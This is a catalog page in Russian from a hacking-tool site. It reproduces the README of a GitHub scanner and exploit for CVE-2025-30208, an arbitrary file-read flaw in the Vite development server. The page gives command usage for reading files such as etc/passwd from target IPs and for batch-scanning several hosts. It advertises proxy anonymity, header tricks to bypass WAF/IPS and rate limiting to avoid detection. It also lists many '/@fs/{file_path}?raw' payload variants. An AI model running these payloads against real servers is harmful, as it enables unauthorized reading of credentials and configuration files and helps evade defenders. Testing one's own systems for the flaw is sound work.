Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-30208 — CVE‑2025‑30208 — это уязвимость средней степени тяжести, допускающая произвольное чтение файлов на сервере разработки Vite (популярный инструмент сборки фронтенда). | Kitploit
Инструменты/GitHubGitHub/th-secforge/cve-2025-30208
РазведкаСканеры уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на Проникновение
GitHubth-secforge/cve-2025-30208

CVE-2025-30208

CVE‑2025‑30208 — это уязвимость средней степени тяжести, допускающая произвольное чтение файлов на сервере разработки Vite (популярный инструмент сборки фронтенда).

Репозиторий
1431 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🔥 Сканер уязвимости CVE-2025-30208 Vite (произвольное чтение файлов)

Python License Security Status Modular

Продвинутый сканер уязвимости CVE-2025-30208 с функциями корпоративного уровня

Профессиональный инструмент тестирования на проникновение для обнаружения уязвимости произвольного чтения файлов в Vite

🚀 Быстрый старт • 📋 Возможности • 🔧 Использование • 📊 Примеры • 🛡️ Безопасность


📖 Обзор

Это комплексный сканер уязвимостей, предназначенный для обнаружения и эксплуатации уязвимости CVE-2025-30208 в серверах разработки Vite. Уязвимость позволяет осуществлять произвольное чтение файлов через конечные точки файловой системы Vite, что потенциально открывает доступ к конфиденциальным файлам конфигурации, исходному коду и системной информации.

🎯 Что делает этот инструмент

  • Обнаруживает уязвимые экземпляры Vite в сетях
  • Безопасно эксплуатирует уязвимость произвольного чтения файлов
  • Находит конфиденциальные файлы и данные конфигурации
  • Формирует отчёты о результатах в нескольких форматах (HTML, JSON, консоль)
  • Управляет сеансами сканирования и конфигурациями
  • Корректно обрабатывает ошибки с помощью механизмов автоматических повторных попыток

🏗️ Модульная архитектура

Теперь инструмент имеет модульную архитектуру для улучшения сопровождаемости и расширяемости:

  • CVE-2025-30208.py — основное приложение сканера
  • payloads.py — продвинутые эксплойт-пейлоады (60+ вариаций)
  • sensitive_files.py — обширная база конфиденциальных файлов (200+ файлов)
  • html_template.py — улучшенный HTML-шаблон отчётов в хакерском стиле

🚀 Быстрый старт

Предварительные требования

pip3 install -r requirements.txt

Базовое использование

python3 CVE-2025-30208.py

CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run

📋 Возможности

🔍 Основное обнаружение уязвимостей

  • 60+ продвинутых пейлоадов: комплексные техники эксплуатации для максимального обнаружения
  • Умное обнаружение: интеллектуальный анализ ответов для исключения ложных срабатываний
  • Проверка в реальном времени: непрерывная валидация ответов цели
  • Комплексное тестирование: проверка всех известных уязвимых конечных точек

🛡️ Расширенные функции безопасности

  • Поддержка прокси: настройка HTTP/HTTPS-прокси для анонимности
  • Пользовательские заголовки: обход WAF/IPS с помощью пользовательских HTTP-заголовков
  • Ограничение скорости: настраиваемые задержки для избежания обнаружения
  • Управление сеансами: сохранение и восстановление сеансов сканирования
  • Проверка ввода: комплексная валидация параметров

🔧 Расширенные возможности

  • Пакетное сканирование: многопоточное сканирование нескольких целей
  • Поиск конфиденциальных файлов: автоматическое обнаружение 200+ конфиденциальных файлов
  • Проверка связности: тестирование протоколов TCP/UDP/HTTP/HTTPS
  • Восстановление после ошибок: автоматические повторные попытки с экспоненциальной задержкой
  • Комплексное журналирование: подробные журналы с временными метками

📊 Отчёты и вывод

  • 🎨 Улучшенные HTML-отчёты: красивые отчёты об уязвимостях в хакерском стиле с анимациями
  • Экспорт в JSON: структурированные данные для дальнейшего анализа
  • Вывод в консоль: цветная индикация в реальном времени
  • Журнальные файлы: подробные аудит-трассы
  • Интерактивный веб-интерфейс: встроенный веб-сервер для просмотра отчётов

🔧 Руководство по использованию

1. Базовая конфигурация

CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > set FILEPATH etc/passwd

CVE-2025-30208 > test

2. Тестирование уязвимости

CVE-2025-30208 > run

# Enable verbose mode for detailed output
CVE-2025-30208 > verbose
CVE-2025-30208 > run

3. Пакетное сканирование

CVE-2025-30208 > set THREADS 10
CVE-2025-30208 > batch

192.168.1.100:3000
192.168.1.101:3000
192.168.1.102:3000
[Press Enter twice to finish]

4. Поиск конфиденциальных файлов

CVE-2025-30208 > scan

5. Расширенная конфигурация

# Configure proxy
CVE-2025-30208 > proxy
Enter proxy: http://127.0.0.1:8080

# Set custom headers
CVE-2025-30208 > headers
Enter headers: {"User-Agent": "Custom Scanner"}

# Configure rate limiting
CVE-2025-30208 > rate
Enter rate limit: 1.0

6. Улучшенные HTML-отчёты

# Generate beautiful HTML report
CVE-2025-30208 > pull

# Start web server to view report
CVE-2025-30208 > web

# Start web server on specific port
CVE-2025-30208 > web 8081

# Stop web server
CVE-2025-30208 > web off

📊 Справочник команд

КомандаОписаниеПример
set <option> <value>Установить параметры конфигурацииset RHOST 192.168.1.100
show optionsПоказать текущие настройкиshow options
editИнтерактивный редактор параметровedit
run / exploitЗапустить тест на уязвимостьrun
batchПакетное сканирование нескольких целейbatch
scanПоиск конфиденциальных файловscan
pullЭкспортировать результаты в HTML/JSONpull
web [on|off|port]Веб-сервер для HTML-отчётовweb 8080
saveСохранить конфигурацию сеансаsave
loadЗагрузить конфигурацию сеансаload
testПроверить связь с цельюtest
validateПроверить текущую конфигурациюvalidate
verboseПереключить подробный режимverbose
proxyНастроить параметры проксиproxy
headersУстановить пользовательские HTTP-заголовкиheaders
rateНастроить ограничение скоростиrate
logПоказать информацию журналаlog
help / ?Показать справкуhelp
exit / quitВыйти из инструментаexit

⚙️ Параметры конфигурации

ПараметрОписаниеПо умолчаниюПроверка
RHOSTЦелевой хост / IP-адрес-Проверка имени хоста / IP
RPORTНомер порта цели-Диапазон портов (1-65535)
FILEPATHПуть к файлу для проверкиetc/passwdПроверка пути
PROXYURL HTTP/HTTPS-прокси-Проверка формата URL
VERBOSEВключить подробный выводfalseПроверка логического значения
RATE_LIMITЗадержка между запросами (секунды)0.3Числовая проверка
THREADSКоличество потоков для пакетного сканирования5Проверка целочисленного значения
TIMEOUTТайм-аут запроса (секунды)5Проверка целочисленного значения
CUSTOM_HEADERSПользовательские HTTP-заголовки (JSON){}Проверка формата JSON

🎨 Расширенная система пейлоадов

Сканер теперь использует 60+ различных вариаций пейлоадов, организованных в payloads.py:

Основные пейлоады @fs

/@fs/{file_path}?raw??
/@fs/{file_path}?raw&url
/@fs/{file_path}?import&raw??
/@fs/{file_path}?raw&import
/@fs/{file_path}?import&url

Расширенные вариации параметров

/@fs/{file_path}?raw&source
/@fs/{file_path}?raw&content
/@fs/{file_path}?raw&data
/@fs/{file_path}?raw&file
/@fs/{file_path}?raw&type=text
/@fs/{file_path}?raw&format=text
/@fs/{file_path}?raw&encoding=utf8

Специфические вариации Vite

/@fs/{file_path}?raw&vite&dev
/@fs/{file_path}?raw&vite&hot
/@fs/{file_path}?raw&vite&hmr
/@fs/{file_path}?raw&development
/@fs/{file_path}?raw&debug
Скачать инструмент